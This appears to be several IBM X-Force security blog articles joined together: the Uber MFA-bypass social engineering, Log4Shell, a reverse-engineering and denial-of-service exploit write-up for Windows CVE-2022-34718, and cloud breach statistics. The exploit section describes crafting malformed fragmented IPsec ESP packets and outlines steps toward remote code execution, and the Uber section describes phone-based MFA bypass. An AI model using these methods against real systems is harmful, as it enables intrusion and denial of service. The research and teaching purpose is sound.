First, Carruthers believes one potential and even likely scenario is the person targeted at Uber may have been a contractor. The hacker likely purchased stolen credentials belonging to this contractor on the dark web — as an initial step in their social engineering campaign. The attacker likely then used those credentials to log into one of Uber’s systems. However, Uber had multi-factor authentication (MFA) in place, and the attacker was asked to validate their identity multiple times.
According to reports, “TeaPot” contacted the target victim directly with a phone call, pretended to be IT, and asked them to approve the MFA requests. Once they did, the attacker logged in and could access different systems, including Slack and other sensitive areas.
“The key lesson here is that just because you have measures like MFA in place, it doesn’t mean you’re secure or that attacks can’t happen to you,” Carruthers said. “For a very long time, a lot of organizations were saying, ‘Oh, we have MFA, so we’re not worried.’ That’s not a good mindset, as demonstrated in this specific case.”
As part of her role with X-Force, Carruthers conducts social engineering assessments for organizations. She has been doing MFA bypass techniques for clients for several years. “That mindset of having a false sense of security is one of the things I think organizations still aren’t grasping because they think they have the tools in place so that it can’t happen to them.”
Social Engineering Tests Can Help Prevent These Types of Attacks
According to Carruthers, social engineering tests fall into two buckets: remote and onsite. She and her team look at phishing, voice phishing and smishing for remote tests. The onsite piece involves the X-Force team showing up in person and essentially breaking and entering a client’s network. During the testing, the X-Force teams attempt to coerce employees into giving them information that would allow them to breach systems — and take note of those who try to stop them and those who do not.
The team’s remote test focuses on an increasingly popular method: layering the methods together almost like an attack chain. Instead of only conducting a phishing campaign, this adds another step to the mix.
“What we’ll do, just like you saw in this Uber attack, is follow up on the phish with phone calls,” Carruthers said. “Targets will tell us the phish sounded suspicious but then thank us for calling because we have a friendly voice. And they’ll actually comply with what that phishing email requested. But it’s interesting to see attackers starting to layer on social engineering approaches rather than just hoping one of their phishing emails work.”
She explained that the team’s odds of success go up threefold when following up with a phone call. According to IBM’s 2022 X-Force Threat Intelligence Index, the click rate for the average targeted phishing campaign was 17.8%. Targeted phishing campaigns that added phone calls (vishing, or voice phishing) were three times more effective, netting a click from 53.2% of victims.
What Is OSINT — and How It Helps Attackers Succeed
For bad actors, the more intelligence they have on their target, the better. Attackers typically gather intelligence by scraping data readily available from public sources, called open source intelligence (OSINT). Thanks to social media and publicly-documented online activities, attackers can easily profile an organization or employee.
Carruthers says she’s spending more time today doing OSINT than ever before. “Actively getting info on a company is so important because that gives us all of the bits and pieces to build that campaign that’s going to be realistic to our targets,” she said. “We often look for people who have access to more sensitive information, and I wouldn’t be surprised if that person (in the Uber hack) was picked because of the access they had.”
For Carruthers, it’s critical to understand what information is out there about employees and organizations. “That digital footprint could be leveraged against them,” she said. “I can’t tell you how many times clients come back to us saying they couldn’t believe we found all these things. A little piece of information that seems harmless could be the cherry on top of our campaign that makes it look much more realistic.”
Tangible Hack Prevention Strategies
While multi-factor authentication can be bypassed, it is still a critical security tool. However, Carruthers suggests that organizations consider deploying a physical device like a Fido2 token. This option shouldn’t be too difficult to manage for small to medium-sized businesses.
“Next, I recommend using password managers with long, complex master passwords so they can’t be guessed or cracked or anything like that,” she said. “Those are some of the best practices for applications like Slack.”
Of course, no hacking prevention strategies that address social engineering would be complete without security awareness. Carruthers advises organizations to be aware of attacks out in the wild and be ready to address them. “Companies need to actually go through and review what’s included in their current training, and whether it’s addressing the realistic attacks happening today against their organization,” she said.
For example, the training may teach employees not to give their passwords to anyone over the phone. But when an attacker calls, they may not ask for your password. Instead, they may ask you to log in to a website that they control. Organizations will want to ensure their training is always fresh and interactive and that employees stay engaged.
The final piece of advice from Carruthers is for companies to refrain from relying too heavily on security tools. “It’s so easy to say that you can purchase a certain security tool and that you’ll never have to worry about being phished again,” she said.
The key takeaways here are:
Incorporate physical devices into MFA. This builds a significant roadblock for attackers.
Try to minimize your digital footprint. Avoid oversharing in public forums like social media.
Use password managers. This way, employees only need to remember one password.
Bolster security awareness programs with particular focus on social engineering threats. Far too often, security awareness misses this key element.
Don’t rely too heavily on security tools. They can only take your security posture so far.
Finally, it’s important to reiterate what Carruthers and the X-Force team continue to prove with their social engineering tests: a false sense of security is counterproductive to preventing attacks. A more effective strategy combines quality security practices with awareness, adaptability and vigilance.
Learn more about X-Force Red penetration testing services here. To schedule a no-cost consult with X-Force, click here.
In late 2021, the Apache Software Foundation disclosed a vulnerability that set off a panic across the global tech industry. The bug, known as Log4Shell, was found in the ubiquitous open-source logging library Log4j, and it exposed a huge swath of applications and services.
Nearly anything from popular consumer and enterprise platforms to critical infrastructure and IoT devices was exposed. Over 35,000 Java packages were impacted by Log4j vulnerabilities. That’s over 8% of the Maven Central repository, the world’s largest Java package repository.
When Log4j was discovered, CISA Director Jen Easterly said, “This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious.”
Since Log4j surfaced, how has the security community responded? What lessons have we learned (or not learned)?
Significant Lingering Threat
Log4Shell is no longer a massive, widespread danger. Still, researchers warn that the vulnerability is still present in far too many systems. And actors will continue to exploit it for years to come.
Log4Shell was unusual because it was so easy to exploit wherever it was present. Developers use logging utilities to record operations in applications. To exploit Log4Shell, all an attacker has to do is get the system to log a special string of code. From there, they can take control of their victim to install malware or launch other attacks.
“Logging is fundamental to essentially any computer software or hardware operation. Whether it’s a phlebotomy machine or an application server, logging is going to be present,” said David Nalley, president of the nonprofit Apache Software Foundation, in an interview with Wired. “We knew Log4j was widely deployed, we saw the download numbers, but it’s hard to fully grasp since in open source you’re not selling a product and tracking contracts. I don’t think you fully appreciate it until you have a full accounting of where software is, everything it’s doing and who’s using it. And I think the fact that it was so incredibly ubiquitous was a factor in everyone reacting so immediately. It’s a little humbling, frankly.”
According to Nalley, they had software fixes out within two weeks. Alarmingly, Apache still sees up to 25% of downloads involving non-patched versions of Log4j.
Continued Log4j Attack Incidents
Threat actors continue to exploit the Log4j vulnerability to this day. CISA has released alerts regarding Iranian and Chinese actors using the exploit. From Iran, cyber threat actors took advantage of the Log4Shell vulnerability in an unpatched VMware Horizon server, installed crypto mining software, moved laterally to the domain controller, compromised credentials and implanted reverse proxies on several hosts to maintain persistence. Meanwhile, the top Common Vulnerabilities and Exposures (CVEs) most used by Chinese state-sponsored cyber actors since 2020 is Log4j.
Given the danger and ongoing threat, why do so many vulnerable versions of Log4j still persist? Could it be that some IT pros don’t really know what’s in their software?
The Risk of Open-Source Software
The problem isn’t software vulnerability alone. It’s also not knowing if you have vulnerable code hiding your applications. Surprisingly, many security and IT professionals have no idea whether Log4j is part of their software supply chain. Or even worse, they choose to ignore the danger.
Part of the challenge is due to the rise of open-source software (OSS). Coders leverage OSS to accelerate development, cut costs and reduce time to market. Easy access to open-source frameworks and libraries takes the place of writing custom code or buying proprietary software. And while many applications get built quickly, the exact contents might not be known.
In a Linux Foundation SBOM and Cybersecurity Readiness report, 98% of organizations surveyed use open-source software. Due to the explosion of OSS use, it’s clear that supply chain cybersecurity may be impossible to gauge for any given application. If you don’t know what’s in your supply chain, how can you possibly know it’s secure?
Security Starts With SBOM
The threat of vulnerabilities (both known and zero-day) combined with the unknown contents of software packages has led security regulators and decision-makers to push for the development of software bills of materials.
According to CISA:
A “software bill of materials” (SBOM) has emerged as a key building block in software security and software supply chain risk management. An SBOM is a nested inventory, a list of ingredients that make up software components.
If you have a detailed list of individual software components, you can assess risk exposure more accurately. Also, with a well-developed SBOM, you can match your list against CISA’s Known Exploited Vulnerabilities Catalog. Or, if you hear about an emerging mass exploit like Log4j, you can quickly confirm if your stack is at risk. If you don’t have an SBOM, you’re in the dark until you are notified by your vendor or until you get hacked.
Finding Millions of Vulnerabilities
If you were to scan your systems for software vulnerabilities, you might discover hundreds of thousands of weaknesses. Also, if you merged with another company recently, you inherit their risk burden as well. For larger enterprises, detected vulnerabilities can number in the millions.
Trying to patch everything at once would be impossible. Instead, proper triage is essential. For example, vulnerabilities nearest to mission-critical systems should be prioritized. Also, an organization should audit, monitor and test its software vulnerability profile often. And since IT teams might add applications at any moment, an up-to-date network inventory and scheduled vulnerability scanning are critical. Automated software vulnerability management programs can be a great help here.
Many companies don’t have the time or qualified resources to identify, prioritize and remediate vulnerabilities. The process can be overwhelming. Given the high risk involved, some organizations opt to hire expert vulnerability mitigation services.
Still More to Learn
While Log4j sent some into a frenzy, others didn’t even seem to notice. This gives rise to the debate about cyber responsibility. If my partner hasn’t patched a vulnerability, and it affects my operations, should my partner be held responsible?
In one survey, 87% of respondents said that given the level of cyber risk posed by Log4j, government regulatory agencies (such as the U.S. Federal Trade Commission) should take legal action against organizations that fail to patch the flaw.
Only time will tell how far the security community will take responsibility for vulnerabilities — whether by being proactive or by force.
September’s Patch Tuesday unveiled a critical remote vulnerability in tcpip.sys, CVE-2022-34718. The advisory from Microsoft reads: “An unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPsec is enabled, which could enable a remote code execution exploitation on that machine.”
Pure remote vulnerabilities usually yield a lot of interest, but even over a month after the patch, no additional information outside of Microsoft’s advisory had been publicly published. From my side, it had been a long time since I attempted to do a binary patch diff analysis, so I thought this would be a good bug to do root cause analysis and craft a proof-of-concept (PoC) for a blog post.
On October 21 of last year, I posted an exploit demo and root cause analysis of the bug. Shortly thereafter a blog post and PoC was published by Numen Cyber Labs on the vulnerability, using a different exploitation method than I used in my demo.
In this blog — my follow-up article to my exploit video — I include an in-depth explanation of the reverse engineering of the bug and correct some inaccuracies I found in the Numen Cyber Labs blog.
In the following sections, I cover reverse engineering the patch for CVE-2022-34718, the affected protocols, identifying the bug, and reproducing it. I’ll outline setting up a test environment and write an exploit to trigger the bug and cause a Denial of Service (DoS). Finally, I’ll look at exploit primitives and outline the next steps to turn the primitives into remote code execution (RCE).
Patch Diffing
Microsoft’s advisory does not contain any specific details of the vulnerability except that it is contained in the TCP/IP driver and requires IPsec to be enabled. In order to identify the specific cause of the vulnerability, we’ll compare the patched binary to the pre-patch binary and try to extract the “diff”(erence) using a tool called BinDiff.
I used Winbindex to obtain two versions of tcpip.sys: one right before the patch and one right after, both for the same version of Windows. Getting sequential versions of the binaries is important, as even using versions a few updates apart can introduce noise from differences that are not related to the patch, and cause you to waste time while doing your analysis. Winbindex has made patch analysis easier than ever, as you can obtain any Windows binary beginning from Windows 10. I loaded both of the files in Ghidra, applied the Program Database (pdb) files, and ran auto analysis (checking aggressive instruction finder works best). Afterward, the files can be exported into a BinExport format using the extension BinExport for Ghidra. The files can then be loaded into BinDiff to create a diff and start analyzing their differences:
BinDiff summary comparing the pre- and post-patch binaries
BinDiff works by matching functions in the binaries being compared using various algorithms. In this case there, we have applied function symbol information from Microsoft, so all the functions can be matched by name.
List of matched functions sorted by similarity
Above we see there are only two functions that have a similarity less than 100%. The two functions that were changed by the patch are IppReceiveEsp and Ipv6pReassembleDatagram.
Vulnerability Root Cause Analysis
Previous research shows the Ipv6pReassembleDatagram function handles reassembling Ipv6 fragmented packets.
The function name IppReceiveEsp seems to indicate this function handles the receiving of IPsec ESP packets.
Before diving into the patch, I’ll briefly cover Ipv6 fragmentation and IPsec. Having a general understanding of these packet structures will help when attempting to reverse engineer the patch.
IPv6 Fragmentation:
An IPv6 packet can be divided into fragments with each fragment sent as a separate packet. Once all of the fragments reach the destination, the receiver reassembles them to form the original packet.
The diagram below illustrates the fragmentation:
Illustration of Ipv6 fragmentation
According to the RFC, fragmentation is implemented via an Extension Header called the Fragment header, which has the following format:
Ipv6 Fragment Header format
Where the Next Header field is the type of header present in the fragmented data.
IPsec (ESP):
IPsec is a group of protocols that are used together to set up encrypted connections. It’s often used to set up Virtual Private Networks (VPNs). From the first part of patch analysis, we know the bug is related to the processing of ESP packets, so we’ll focus on the Encapsulating Security Payload (ESP) protocol.
As the name suggests, the ESP protocol encrypts (encapsulates) the contents of a packet. There are two modes: in tunnel mode, a copy of IP header is contained in the encrypted payload, and in transport mode where only the transport layer portion of the packet is encrypted. Like IPv6 fragmentation, ESP is implemented as an extension header. According to the RFC, an ESP packet is formatted as follows:
Top Level Format of an ESP Packet
Where Security Parameters Index (SPI) and Sequence Number fields comprise the ESP extension header, and the fields between and including Payload Data and Next Header are encrypted. The Next Header field describes the header contained in Payload Data.
Now with a primer of Ipv6 Fragmentation and IPsec ESP, we can continue the patch diff analysis by analyzing the two functions we found were patched.
Ipv6pReassembleDatagram
Comparing the side by side of the function graphs, we can see that a single new code block has been introduced into the patched function:
Side-by-side comparison of the pre- and post-patch function graphs of Ipv6ReassembleDatagram
Let’s take a closer look at the block:
New code block in the patched function
The new code block is doing a comparison of two unsigned integers (in registers EAX and EDX) and jumping to a block if one value is less than the other. Let’s take a look at that destination block:
The target code has an unconditional call to the function IppDeleteFromReassemblySet. Taking a guess from the name of this function, this block seems to be for error handling. We can intuit that the new code that was added is some sort of bounds check, and there has been a “goto error” line inserted into the code, if the check fails.
With this bit of insight, we can perform static analysis in a decompiler.
0vercl0ck previously published a blog post doing vulnerability analysis on a different Ipv6 vulnerability and went deep into the reverse engineering of tcpip.sys. From this work and some additional reverse engineering, I was able to fill in structure definitions for the undocumented Packet_t and Reassembly_t objects, as well as identify a couple of crucial local variable assignments.
Decompilation output of Ipv6ReassembleDatagram
In the above code snippet, the pink box surrounds the new code added by the patch. Reassembly->nextheader_offset contains the byte offset of the next_header field in the Ipv6 fragmentation header. The bounds check compares next_header_offset to the length of the header buffer. On line 29, HeaderBufferLen is used to allocate a buffer and on line 35, Reassembly->nextheder_offset is used to index and copy into the allocated buffer.
Because this check was added, we now know there was a condition that allows nextheader_offset to exceed the header buffer length. We’ll move on to the second patched function to seek more answers.
IppReceiveEsp
Looking at the function graph side by side in the BinDiff workspace, we can identify some new code blocks introduced into the patched function:
Side-by-side comparison of the pre- and post-patch function graphs of IppReceiveEsp
The image below shows the decompilation of the function IppReceiveEsp, with a pink box surrounding the new code added by the patch.
Decompilation output of IppReceiveESP
Here, a new check was added to examine the Next Header field of the ESP packet. The Next Header field identifies the header of the decrypted ESP packet. Recall that a Next Header value can correspond to an upper layer protocol (such as TCP or UDP) or an extension header (such as fragmentation header or routing header). If the value in NextHeader is 0, 0x2B, or 0x2C, IppDiscardReceivedPackets is called and the error code is set to STATUS_DATA_NOT_ACCEPTED. These values correspond to IPv6 Hop-by-Hop Option, Routing Header for Ipv6, and Fragment Header for IPv6, respectively.
Referring back to the ESP RFC it states, “In the IPv6 context, ESP is viewed as an end-to-end payload, and thus should appear after hop-by-hop, routing, and fragmentation extension headers.” Now the problem becomes clear. If a header of these types is contained within an ESP payload, it violates the RFC of the protocol, and the packet will be discarded.
Putting It All Together
Now that we have diagnosed the patches in two different functions, we can figure out how they are related. In the first function Ipv6ReassembleDatagram, we determined the fix was for a buffer overflow.
Decompilation output of Ipv6ReassembleDatagram
Recall that the size of the victim buffer is calculated as the size of the extension headers, plus the size of an Ipv6 header (Line 10 above). Now refer back to the patch that was inserted (Line 16). Reassembly->nextheader_offset refers to the offset of the Next Header value of the buffer holding the data for the fragment.
Now refer back to the structure of an ESP packet:
Top Level Format of an ESP Packet
Notice that the Next Header field comes *after* Payload Data. This means that Reassembly->nextheader_offset will include the size of the Payload Data, which is controlled by the size of the data, and can be much greater than the size of the extension headers. The expected location of the Next Header field is inside an extension header or Ipv6 header. In an ESP packet, it is not inside the header, since it is actually contained in the encrypted portion of the packet.
Illustrated root cause of CVE-2022-34718
Now refer back to line 35 of Ipv6ReassembleDatagram, this is where an out of bounds 1 byte write occurs (the size and value of NextHeader).
Reproducing the Bug
We now know the bug can be triggered by sending an IPv6 fragmented datagram via IPsec ESP packets.
The next question to answer: how will the victim be able to decrypt the ESP packets?
To answer this question, I first tried to send packets to a victim containing an ESP Header with junk data and put a breakpoint on to the vulnerable IppReceiveEsp function, to see if the function could be reached. The breakpoint was hit, but the internal function I thought did the decrypting IppReceiveEspNbl, returned an error, so the vulnerable code was never reached. I further reverse engineered IppReceiveEspNbl and worked my way through to find the point of failure. This is where I learned that in order to successfully decrypt an ESP packet, a security association must be established.
A security association consists of a shared state, primarily cryptographic keys and parameters, maintained between two endpoints to secure traffic between them. In simple terms, a security association defines how a host will encrypt/decrypt/authenticate traffic coming from/going to another host. Security associations can be established via the Internet Key Exchange (IKE) or Authenticated IP Protocol. In essence, we need a way to establish a security association with the victim, so that it knows how to decrypt the incoming data from the attacker.
For testing purposes, instead of implementing IKE, I decided to create a security association on the victim manually. This can be done using the Windows Filtering Platform WinAPI (WFP). Numen’s blog post stated that it’s not possible to use WFP for secret key management. However, that is incorrect and by modifying sample code provided by Microsoft, it’s possible to set a symmetric key that the victim will use to decrypt ESP packets coming from the attacker IP.
Exploitation
Now that the victim knows how to decrypt ESP traffic from us (the attacker) we can build malformed encrypted ESP packets using scapy. Using scapy we can send packets at the IP layer. The exploitation process is simple:
CVE-2022-34718 PoC
I create a set of fragmented packets from an ICMPv6 Echo request. Then for each fragment, they are encrypted into an ESP layer before sending.
Primitive
From the root cause analysis diagram pictured above, we know our primitive gives us an out of bounds write at
The value of the write is controllable via the value of the Next Header field. I set this value on line 36 in my exploit above (0x41 😉).
Denial of Service (DoS)
Corrupting just one byte into a random offset of the NetIoProtocolHeader2 pool (where the target buffer is allocated), usually does not immediately cause a crash. We can reliably crash the target by inserting additional headers within the fragmented message to parse, or by repeatedly pinging the target after corrupting a large portion of the pool.
Limitations to Overcome For RCE
offset is attacker controlled, however according to the ESP RFC, padding is required such that the Integrity Check Value (ICV) field (if present) is aligned on a 4-byte boundary.
Because
sizeof(Padding Length) = sizeof(Next Header) = 1,
sizeof(Payload Data) + sizeof(Padding) + 2 must be 4 byte aligned.
And therefore:
offset = 4n - 1
Where n can be any positive integer, constrained by the fact the payload data and padding must fit within a single packet and is therefore limited by MTU (frame size). This is problematic because it means full pointers cannot be overwritten. This is limiting, but not necessarily prohibitive; we can still overwrite the offset of an address in an object, a size, a reference counter, etc. The possibilities available to us depend on what objects can be sprayed in the kernel pool where the victim headerBuff is allocated.
Heap Grooming Research
The affected kernel pool in WinDbg
The victim out of bounds buffer is allocated in the NetIoProtocolHeader2 pool. The first steps in heap grooming research are: examine the type of objects allocated in this pool, what is contained in them, how they are used, and how the objects are allocated/freed. This will allow us to examine how the write primitive can be used to obtain a leak or build a stronger primitive. We are not necessarily restricted to NetIoProtocolHeader2. However, because the position of the victim out-of-bounds buffer cannot be predicted, and the address of surrounding pools is randomized, targeting other pools seems challenging.
Demo
Watch the demo exploiting CVE-2022-34718 ‘EvilESP’ for DoS below:
Takeaways
When laid out like this, the bug seems pretty simple. However, it took several long days of reverse engineering and learning about various networking stacks and protocols to understand the full picture and write a DoS exploit. Many researchers will say that configuring the setup and understanding the environment is the most time-consuming and tedious part of the process, and this was no exception. I am very glad that I decided to do this short project; I understand Ipv6, IPsec, and fragmentation much better now.
To learn how IBM Security X-Force can help you with offensive security services, schedule a no-cost consult meeting here: IBM X-Force Scheduler.
If you are experiencing cybersecurity issues or an incident, contact X-Force to help: U.S. hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.
As cybercriminals remain steadfast in their pursuit of unsuspecting ways to infiltrate today’s businesses, a new report by IBM Security X-Force highlights the top tactics of cybercriminals, the open doors users are leaving for them and the burgeoning marketplace for stolen cloud resources on the dark web. The big takeaway from the data is businesses still control their own destiny when it comes to cloud security. Misconfigurations across applications, databases and policies could have stopped two-thirds of breached cloud environments observed by IBM in this year’s report.
IBM’s 2021 X-Force Cloud Security Threat Landscape Report has expanded from the 2020 report with new and more robust data, spanning Q2 2020 through Q2 2021. Data sets we used include dark web analysis, IBM Security X-Force Red penetration testing data, IBM Security Services metrics, X-Force Incident Response analysis and X-Force Threat Intelligence research. This expanded dataset gave us an unprecedented view across the whole technology estate to make connections for improving security. Here are some quick highlights:
Configure it Out — Two out of three breached cloud environments studied were caused by improperly configured Application Programming Interface (APIs). X-Force incident responders also observed virtual machines with default security settings that were erroneously exposed to the Internet, including misconfigured platforms and insufficiently enforced network controls.
Rulebreakers Lead to Compromise — X-Force Red found password and policy violations in the vast majority of cloud penetration tests conducted over the past year. The team also observed a significant growth in the severity of vulnerabilities in cloud-deployed applications, while the number of disclosed vulnerabilities in cloud-deployed applications rocketed 150% over the last five years.
Automatic for the Cybercriminals — With nearly 30,000 compromised cloud accounts for sale at bargain prices on dark web marketplaces and Remote Desktop Protocol accounting for 70% of cloud resources for sale, cybercriminals have turnkey options to further automate their access to cloud environments.
All Eyes on Ransomware & Cryptomining — Cryptominers and ransomware remain the top dropped malware into cloud environments, accounting for over 50% of detected system compromises, based on the data analyzed.
More and more businesses are recognizing the business value of hybrid cloud and distributing their data across a diverse infrastructure. In fact, the 2021 Cost of a Data Breach Report revealed that breached organizations implementing a primarily public or private cloud approach suffered approximately $1 million more in breach costs than organizations with a hybrid cloud approach.
With businesses seeking heterogeneous environments to distribute their workloads and better control where their most critical data is stored, modernization of those applications is becoming a point of control for security. The report is putting a spotlight on security policies that don’t encompass the cloud, increasing the security risks businesses are facing in disconnected environments. Here are a few examples:
The Perfect Pivot — As enterprises struggle to monitor and detect cloud threats, cloud environments today. This has contributed to threat actors pivoting from on-premise into cloud environments, making this one of the most frequently observed infection vectors targeting cloud environments — accounting for 23% of incidents IBM responded to in 2020.
API Exposure — Another top infection vector we identified was improperly configured assets. Two-thirds of studied incidents involved improperly configured APIs. APIs lacking authentication controls can allow anyone, including threat actors, access to potentially sensitive information. On the other side, APIs being granted access to too much data can also result in inadvertent disclosures.
Many businesses don’t have the same level of confidence and expertise when configuring security controls in cloud computing environments compared to on-premise, which leads to a fragmented and more complex security environment that is tough to manage. Organizations need to manage their distributed infrastructure as one single environment to eliminate complexity and achieve better network visibility from cloud to edge and back. By modernizing their mission critical workloads, not only will security teams achieve speedier data recovery, but they will also gain a vastly more holistic pool of insights around threats to their organization that can inform and accelerate their response.
Trust That Attackers Will Succeed & Hold the Line
Evidence is mounting every day that the perimeter has been obliterated and the findings in the report just add to that corpus of data. That is why taking a zero trust approach is growing in popularity and urgency. It removes the element of surprise and allows security teams to get ahead of any lack of preparedness to respond. By applying this framework, organizations can better protect their hybrid cloud infrastructure, enabling them to control all access to their environments and to monitor cloud activity and proper configurations. This way organizations can go on offense with their defense, uncovering risky behaviors and enforcing privacy regulation controls and least privilege access. Here’s some of the evidence derived from the report:
Powerless Policy — Our research suggests that two-thirds of studied breaches into cloud environments would have likely been prevented by more robust hardening of systems, such as properly implementing security policies and patching.
Lurking in the Shadows — “Shadow IT”, cloud instances or resources that have not gone through an organization’s official channels, indicate that many organizations aren’t meeting today’s baseline security standards. In fact, X-Force estimates the use of shadow IT contributed to over 50% of studied data exposures.
Password is “admin 1” — The report illustrates X-Force Red data accumulated over the last year, revealing that the vast majority of the team’s penetration tests into various cloud environments found issues with either passwords or policy adherence.
The recycling use of these attack vectors emphasizes that threat actors are repetitively relying on human error for a way into the organization. It’s imperative that businesses and security teams operate with the assumption of compromise to hold the line.
Dark Web Flea Markets Selling Cloud Access
Cloud resources are providing an excess of corporate footholds to cyber actors, drawing attention to the tens of thousands of cloud accounts available for sale on illicit marketplaces at a bargain. The report reveals that nearly 30,000 compromised cloud accounts are on display on the dark web, with sales offers that range from a few dollars to over $15,000 (depending on geography, amount of credit on the account and level of account access) and enticing refund policies to sway buyers’ purchasing power.
But that’s not the only cloud “tool” for sale on dark web markets with our analysis highlighting that Remote Desktop Protocol (RDP) accounts for more than 70% of cloud resources for sale — a remote access method that greatly exceeds any other vector being marketed. While illicit marketplaces are the optimal shopping grounds for threat actors in need of cloud hacks, concerning us the most is a persistent pattern in which weak security controls and protocols — preventable forms of vulnerability — are repeatedly exploited for illicit access.